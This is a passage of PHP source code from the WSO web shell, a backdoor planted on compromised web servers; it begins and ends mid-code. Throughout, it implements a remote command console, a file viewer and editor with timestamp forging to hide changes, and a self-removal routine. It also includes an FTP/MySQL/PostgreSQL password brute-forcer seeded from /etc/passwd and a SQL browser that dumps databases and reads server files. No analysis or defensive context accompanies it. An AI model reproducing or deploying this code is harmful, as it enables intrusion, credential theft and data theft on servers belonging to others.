(function_exists(\"mime_content_type\")) {\r\n $type = @mime_content_type($_POST[\'p1\']);\r\n header(\"Content-Type: \" . $type);\r\n } else\r\n header(\"Content-Type: application/octet-stream\");\r\n $fp = @fopen($_POST[\'p1\'], \"r\");\r\n if($fp) {\r\n while(!@feof($fp))\r\n echo @fread($fp, 1024);\r\n fclose($fp);\r\n }\r\n }exit;\r\n }\r\n if( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n if(!file_exists($_POST[\'p1\'])) {\r\n $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) {\r\n $_POST[\'p2\'] = \"edit\";\r\n fclose($fp);\r\n }\r\n }\r\n }\r\n wsoHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) {\r\n echo \'File not exists\';\r\n wsoFooter();\r\n return;\r\n }\r\n $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n if(!$uid) {\r\n $uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n $gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.wsoPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Change time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) )\r\n $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) )\r\n $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else\r\n $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v)\r\n echo \'<a href=# onclick=\"g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')\">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) {\r\n case \'view\':\r\n echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) {\r\n while( !@feof($fp) )\r\n echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n }\r\n echo \'</pre>\';\r\n break;\r\n case \'highlight\':\r\n if( @is_readable($_POST[\'p1\']) ) {\r\n echo \'<div class=ml1 style=\"background-color: #e1e1e1;color:black;\">\';\r\n $code = @highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n }\r\n break;\r\n case \'chmod\':\r\n if( !empty($_POST[\'p3\']) ) {\r\n $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms))\r\n echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value=\"\";</script>\';\r\n }\r\n clearstatcache();\r\n echo \'<script>p3_=\"\";</script><form onsubmit=\"g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;\"><input type=text name=chmod value=\"\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'\"><input type=submit value=\">>\"></form>\';\r\n break;\r\n case \'edit\':\r\n if( !is_writable($_POST[\'p1\'])) {\r\n echo \'File isn\\\'t writeable\';\r\n break;\r\n }\r\n if( !empty($_POST[\'p3\']) ) {\r\n $time = @filemtime($_POST[\'p1\']);\r\n $_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n $fp = @fopen($_POST[\'p1\'],\"w\");\r\n if($fp) {\r\n @fwrite($fp,$_POST[\'p3\']);\r\n @fclose($fp);\r\n echo \'Saved!<br><script>p3_=\"\";</script>\';\r\n @touch($_POST[\'p1\'],$time,$time);\r\n }\r\n }\r\n echo \'<form onsubmit=\"g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;\"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) {\r\n while( !@feof($fp) )\r\n echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n }\r\n echo \'</textarea><input type=submit value=\">>\"></form>\';\r\n break;\r\n case \'hexdump\':\r\n $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0; $i<$len; ++$i) {\r\n $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) {\r\n case 0: $h[2] .= \' \'; break;\r\n case 9: $h[2] .= \' \'; break;\r\n case 10: $h[2] .= \' \'; break;\r\n case 13: $h[2] .= \' \'; break;\r\n default: $h[2] .= $c[$i]; break;\r\n }\r\n $n++;\r\n if ($n == 32) {\r\n $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n $h[1] .= \'<br>\';\r\n $h[2] .= \"\\n\";\r\n }\r\n }\r\n echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\':\r\n if( !empty($_POST[\'p3\']) ) {\r\n if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n echo \'Can\\\'t rename!<br>\';\r\n else\r\n die(\'<script>g(null,null,\"\'.urlencode($_POST[\'p3\']).\'\",null,\"\")</script>\');\r\n }\r\n echo \'<form onsubmit=\"g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;\"><input type=text name=name value=\"\'.htmlspecialchars($_POST[\'p1\']).\'\"><input type=submit value=\">>\"></form>\';\r\n break;\r\n case \'touch\':\r\n if( !empty($_POST[\'p3\']) ) {\r\n $time = strtotime($_POST[\'p3\']);\r\n if($time) {\r\n if(!touch($_POST[\'p1\'],$time,$time))\r\n echo \'Fail!\';\r\n else\r\n echo \'Touched!\';\r\n } else echo \'Bad time format!\';\r\n }\r\n clearstatcache();\r\n echo \'<script>p3_=\"\";</script><form onsubmit=\"g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;\"><input type=text name=touch value=\"\'.date(\"Y-m-d H:i:s\", @filemtime($_POST[\'p1\'])).\'\"><input type=submit value=\">>\"></form>\';\r\n break;\r\n }\r\n echo \'</div>\';\r\n wsoFooter();\r\n}\r\n\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n\r\n if(isset($_POST[\'ajax\'])) {\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n ob_start();\r\n echo \"d.cf.cmd.value=\'\';\\n\";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes(\"\\n$ \".$_POST[\'p1\'].\"\\n\".wsoEx($_POST[\'p1\']),\"\\n\\r\\t\\\\\'\\0\"));\r\n if(preg_match(\"!.*cd\\s+([^;]+)$!\",$_POST[\'p1\'],$match)) {\r\n if(@chdir($match[1])) {\r\n $GLOBALS[\'cwd\'] = @getcwd();\r\n echo \"c_=\'\".$GLOBALS[\'cwd\'].\"\';\";\r\n }\r\n }\r\n echo \"d.cf.output.value+=\'\".$temp.\"\';\";\r\n echo \"d.cf.output.scrollTop = d.cf.output.scrollHeight;\";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), \"\\n\", $temp;\r\n exit;\r\n }\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n wsoHeader();\r\n echo \"<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\'\');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n if(n == 38) {\r\n cur--;\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n else\r\n cur++;\r\n } else if(n == 40) {\r\n cur++;\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n else\r\n cur--;\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n cmds.push(cmd);\r\n cmds.push(\'\');\r\n cur = cmds.length-1;\r\n}\r\n</script>\";\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;\"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) {\r\n if($v == \'\') {\r\n echo \'<optgroup label=\"-\'.htmlspecialchars($n).\'-\"></optgroup>\';\r\n continue;\r\n }\r\n echo \'<option value=\"\'.htmlspecialchars($v).\'\">\'.$n.\'</option>\';\r\n }\r\n \r\n echo \'</select><input type=button onclick=\"add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}\" value=\">>\"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style=\"border-bottom:0;margin:0;\" readonly>\';\r\n if(!empty($_POST[\'p1\'])) {\r\n echo htmlspecialchars(\"$ \".$_POST[\'p1\'].\"\\n\".wsoEx($_POST[\'p1\']));\r\n }\r\n echo \'</textarea><table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\"><tr><td width=\"1%\">$</td><td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>\';\r\n echo \'</form></div><script>d.cf.cmd.focus();</script>\';\r\n wsoFooter();\r\n}\r\n\r\nfunction actionSelfRemove() {\r\n\r\n if($_POST[\'p1\'] == \'yes\')\r\n if(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n die(\'Shell has been removed\');\r\n else\r\n echo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n wsoHeader();\r\n echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,\\\'yes\\\')\">Yes</a></div>\';\r\n wsoFooter();\r\n}\r\n\r\nfunction actionBruteforce() {\r\n wsoHeader();\r\n if( isset($_POST[\'proto\']) ) {\r\n echo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\';\r\n if( $_POST[\'proto\'] == \'ftp\' ) {\r\n function wsoBruteForce($ip,$port,$login,$pass) {\r\n $fp = @ftp_connect($ip, $port?$port:21);\r\n if(!$fp) return false;\r\n $res = @ftp_login($fp, $login, $pass);\r\n @ftp_close($fp);\r\n return $res;\r\n }\r\n } elseif( $_POST[\'proto\'] == \'mysql\' ) {\r\n function wsoBruteForce($ip,$port,$login,$pass) {\r\n $res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\r\n @mysql_close($res);\r\n return $res;\r\n }\r\n } elseif( $_POST[\'proto\'] == \'pgsql\' ) {\r\n function wsoBruteForce($ip,$port,$login,$pass) {\r\n $str = \"host=\'\".$ip.\"\' port=\'\".$port.\"\' user=\'\".$login.\"\' password=\'\".$pass.\"\' dbname=postgres\";\r\n $res = @pg_connect($str);\r\n @pg_close($res);\r\n return $res;\r\n }\r\n }\r\n $success = 0;\r\n $attempts = 0;\r\n $server = explode(\":\", $_POST[\'server\']);\r\n if($_POST[\'type\'] == 1) {\r\n $temp = @file(\'/etc/passwd\');\r\n if( is_array($temp) )\r\n foreach($temp as $line) {\r\n $line = explode(\":\", $line);\r\n ++$attempts;\r\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\r\n $success++;\r\n echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\';\r\n }\r\n if(@$_POST[\'reverse\']) {\r\n $tmp = \"\";\r\n for($i=strlen($line[0])-1; $i>=0; --$i)\r\n $tmp .= $line[0][$i];\r\n ++$attempts;\r\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\r\n $success++;\r\n echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp);\r\n }\r\n }\r\n }\r\n } elseif($_POST[\'type\'] == 2) {\r\n $temp = @file($_POST[\'dict\']);\r\n if( is_array($temp) )\r\n foreach($temp as $line) {\r\n $line = trim($line);\r\n ++$attempts;\r\n if( wsoBruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\r\n $success++;\r\n echo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\';\r\n }\r\n }\r\n }\r\n echo \"<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>\";\r\n }\r\n echo \'<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\'\r\n .\'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>\'\r\n .\'<input type=hidden name=c value=\"\'.htmlspecialchars($GLOBALS[\'cwd\']).\'\">\'\r\n .\'<input type=hidden name=a value=\"\'.htmlspecialchars($_POST[\'a\']).\'\">\'\r\n .\'<input type=hidden name=charset value=\"\'.htmlspecialchars($_POST[\'charset\']).\'\">\'\r\n .\'<span>Server:port</span></td>\'\r\n .\'<td><input type=text name=server value=\"127.0.0.1\"></td></tr>\'\r\n .\'<tr><td><span>Brute type</span></td>\'\r\n .\'<td><label><input type=radio name=type value=\"1\" checked> /etc/passwd</label></td></tr>\'\r\n .\'<tr><td></td><td><label style=\"padding-left:15px\"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>\'\r\n .\'<tr><td></td><td><label><input type=radio name=type value=\"2\"> Dictionary</label></td></tr>\'\r\n .\'<tr><td></td><td><table style=\"padding-left:15px\"><tr><td><span>Login</span></td>\'\r\n .\'<td><input type=text name=login value=\"root\"></td></tr>\'\r\n .\'<tr><td><span>Dictionary</span></td>\'\r\n .\'<td><input type=text name=dict value=\"\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic\"></td></tr></table>\'\r\n .\'</td></tr><tr><td></td><td><input type=submit value=\">>\"></td></tr></form></table>\';\r\n echo \'</div><br>\';\r\n wsoFooter();\r\n}\r\n\r\nfunction actionSql() {\r\n class DbClass {\r\n var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) {\r\n $this->type = $type;\r\n }\r\n function connect($host, $user, $pass, $dbname){\r\n switch($this->type) {\r\n case \'mysql\':\r\n if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\':\r\n $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect(\"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname\") ) return true;\r\n break;\r\n }\r\n return false;\r\n }\r\n function selectdb($db) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n if (@mysql_select_db($db))return true;\r\n break;\r\n }\r\n return false;\r\n }\r\n function query($str) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\':\r\n return $this->res = @pg_query($this->link,$str);\r\n break;\r\n }\r\n return false;\r\n }\r\n function fetch() {\r\n $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) {\r\n case \'mysql\':\r\n return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\':\r\n return @pg_fetch_assoc($res);\r\n break;\r\n }\r\n return false;\r\n }\r\n function listDbs() {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->query(\"SHOW databases\");\r\n break;\r\n case \'pgsql\':\r\n return $this->res = $this->query(\"SELECT datname FROM pg_database WHERE datistemplate!=\'t\'\");\r\n break;\r\n }\r\n return false;\r\n }\r\n function listTables() {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\':\r\n return $this->res = $this->query(\"select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'\");\r\n break;\r\n }\r\n return false;\r\n }\r\n function error() {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return @mysql_error();\r\n break;\r\n case \'pgsql\':\r\n return @pg_last_error();\r\n break;\r\n }\r\n return false;\r\n }\r\n function setCharset($str) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n if(function_exists(\'mysql_set_charset\'))\r\n return @mysql_set_charset($str, $this->link);\r\n else\r\n $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'pgsql\':\r\n return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n }\r\n return false;\r\n }\r\n function loadFile($str) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->fetch($this->query(\"SELECT LOAD_FILE(\'\".addslashes($str).\"\') as file\"));\r\n break;\r\n case \'pgsql\':\r\n $this->query(\"CREATE TABLE wso2(file text);COPY wso2 FROM \'\".addslashes($str).\"\';select file from wso2;\");\r\n $r=array();\r\n while($i=$this->fetch())\r\n $r[] = $i[\'file\'];\r\n $this->query(\'drop table wso2\');\r\n return array(\'file\'=>implode(\"\\n\",$r));\r\n break;\r\n }\r\n return false;\r\n }\r\n function dump($table, $fp = false) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n $sql = $create[1].\";\\n\";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n $i = 0;\r\n $head = true;\r\n while($item = $this->fetch()) {\r\n $sql = \'\';\r\n if($i % 1000 == 0) {\r\n $head = true;\r\n $sql = \";\\n\\n\";\r\n }\r\n\r\n $columns = array();\r\n foreach($item as $k=>$v) {\r\n if($v === null)\r\n $item[$k] = \"NULL\";\r\n elseif(is_int($v))\r\n $item[$k] = $v;\r\n else\r\n $item[$k] = \"\'\".@mysql_real_escape_string($v).\"\'\";\r\n $columns[] = \"`\".$k.\"`\";\r\n }\r\n if($head) {\r\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(\", \", $columns).\") VALUES \\n\\t(\".implode(\", \", $item).\')\';\r\n $head = false;\r\n } else\r\n $sql .= \"\\n\\t,(\".implode(\", \", $item).\')\';\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n $i++;\r\n }\r\n if(!$head)\r\n if($fp) fwrite($fp, \";\\n\\n\"); else echo(\";\\n\\n\");\r\n break;\r\n case \'pgsql\':\r\n $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) {\r\n $columns = array();\r\n foreach($item as $k=>$v) {\r\n $item[$k] = \"\'\".addslashes($v).\"\'\";\r\n $columns[] = $k;\r\n }\r\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(\", \", $columns).\') VALUES (\'.implode(\", \", $item).\');\'.\"\\n\";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n }\r\n break;\r\n }\r\n return false;\r\n }\r\n };\r\n $db = new DbClass($_POST[\'type\']);\r\n if((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n switch($_POST[\'charset\']) {\r\n case \"Windows-1251\": $db->setCharset(\'cp1251\'); break;\r\n case \"UTF-8\": $db->setCharset(\'utf8\'); break;\r\n case \"KOI8-R\": $db->setCharset(\'koi8r\'); break;\r\n case \"KOI8-U\": $db->setCharset(\'koi8u\'); break;\r\n case \"cp866\": $db->setCharset(\'cp866\'); break;\r\n }\r\n if(empty($_POST[\'file\'])) {\r\n ob_start(\"ob_gzhandler\", 4096);\r\n header(\"Content-Disposition: attachment; filename=dump.sql\");\r\n header(\"Content-Type: text/plain\");\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v);\r\n exit;\r\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v, $fp);\r\n fclose($fp);\r\n unset($_POST[\'p2\']);\r\n } else\r\n die(\'<script>alert(\"Error! Can\\\'t open file\");window.history.back(-1)</script>\');\r\n }\r\n wsoHeader();\r\n echo \"\r\n<h1>Sql browser</h1><div class=content>\r\n<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'\". htmlspecialchars($GLOBALS[\'cwd\']) .\"\'><input type=hidden name=charset value=\'\". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') .\"\'>\r\n<td><select name=\'type\'><option value=\'mysql\' \";\r\n if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\r\necho \">MySql</option><option value=\'pgsql\' \";\r\nif(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\r\necho \">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\\\"\". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) .\"\\\"></td>\r\n<td><input type=text name=sql_login value=\\\"\". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) .\"\\\"></td>\r\n<td><input type=text name=sql_pass value=\\\"\". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) .\"\\\"></td><td>\";\r\n $tmp = \"<input type=text name=sql_base value=\'\'>\";\r\n if(isset($_POST[\'sql_host\'])){\r\n if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n switch($_POST[\'charset\']) {\r\n case \"Windows-1251\": $db->setCharset(\'cp1251\'); break;\r\n case \"UTF-8\": $db->setCharset(\'utf8\'); break;\r\n case \"KOI8-R\": $db->setCharset(\'koi8r\'); break;\r\n case \"KOI8-U\": $db->setCharset(\'koi8u\'); break;\r\n case \"cp866\": $db->setCharset(\'cp866\'); break;\r\n }\r\n $db->listDbs();\r\n echo \"<select name=sql_base><option value=\'\'></option>\";\r\n while($item = $db->fetch()) {\r\n list($key, $value) = each($item);\r\n echo \'<option value=\"\'.$value.\'\" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n }\r\n echo \'</select>\';\r\n }\r\n else echo $tmp;\r\n }else\r\n echo $tmp;\r\n echo \"</td>\r\n <td><input type=submit value=\'>>\' onclick=\'fs(d.sf);\'></td>\r\n <td><input type=checkbox name=sql_count value=\'on\'\" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . \"> count the number of rows</td>\r\n </tr>\r\n </table>\r\n <script>\r\n s_db=\'\".@addslashes($_POST[\'sql_base\']).\"\';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value=\'\';\r\n if(f.p2) f.p2.value=\'\';\r\n if(f.p3) f.p3.value=\'\';\r\n }\r\n }\r\n function st(t,l) {\r\n d.sf.p1.value = \'select\';\r\n d.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n d.sf.submit();\r\n }\r\n function is() {\r\n for(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\r\n d.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\r\n }\r\n </script>\";\r\n if(isset($db) && $db->link){\r\n echo \"<br/><table width=100% cellpadding=2 cellspacing=0>\";\r\n if(!empty($_POST[\'sql_base\'])){\r\n $db->selectdb($_POST[\'sql_base\']);\r\n echo \"<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>\";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) {\r\n list($key, $value) = each($item);\r\n if(!empty($_POST[\'sql_count\']))\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo \"<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'\".$value.\"\'> <a href=# onclick=\\\"st(\'\".$value.\"\',1)\\\">\".$value.\"</a>\" . (empty($_POST[\'sql_count\'])?\' \':\" <small>({$n[\'n\']})</small>\") . \"</nobr><br>\";\r\n }\r\n echo \"<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\\"download\\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>\";\r\n if(@$_POST[\'p1\'] == \'select\') {\r\n $_POST[\'p1\'] = \'query\';\r\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n $db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n $num = $db->fetch();\r\n $pages = ceil($num[\'n\'] / 30);\r\n echo \"<script>d.sf.onsubmit=function(){st(\\\"\" . $_POST[\'p2\'] . \"\\\", d.sf.p3.value)}</script><span>\".$_POST[\'p2\'].\"</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=\" . ((int)$_POST[\'p3\']) . \">\";\r\n echo \" of $pages\";\r\n if($_POST[\'p3\'] > 1)\r\n echo \" <a href=# onclick=\'st(\\\"\" . $_POST[\'p2\'] . \'\", \' . ($_POST[\'p3\']-1) . \")\'>< Prev</a>\";\r\n if($_POST[\'p3\'] < $pages)\r\n echo \" <a href=# onclick=\'st(\\\"\" . $_POST[\'p2\'] . \'\", \' . ($_POST[\'p3\']+1) . \")\'>Next ></a>\";\r\n $_POST[\'p3\']--;\r\n if($_POST[\'type\']==\'pgsql\')\r\n $_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else\r\n $_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo \"<br><br>\";\r\n }\r\n if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n $db->query(@$_POST[\'p2\']);\r\n if($db->res !== false) {\r\n $title = false;\r\n echo \'<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">\';\r\n $line = 1;\r\n while($item = $db->fetch()) {\r\n if(!$title) {\r\n echo \'<tr>\';\r\n foreach($item as $key => $value)\r\n echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n }\r\n echo \'<tr class=\"l\'.$line.\'\">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) {\r\n if($value == null)\r\n echo \'<td><i>null</i></td>\';\r\n else\r\n echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n }\r\n echo \'</tr>\';\r\n }\r\n echo \'</table>\';\r\n } else {\r\n echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n }\r\n }\r\n echo \"<br></form><form onsubmit=\'d.sf.p1.value=\\\"query\\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>\";\r\n if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\r\n echo 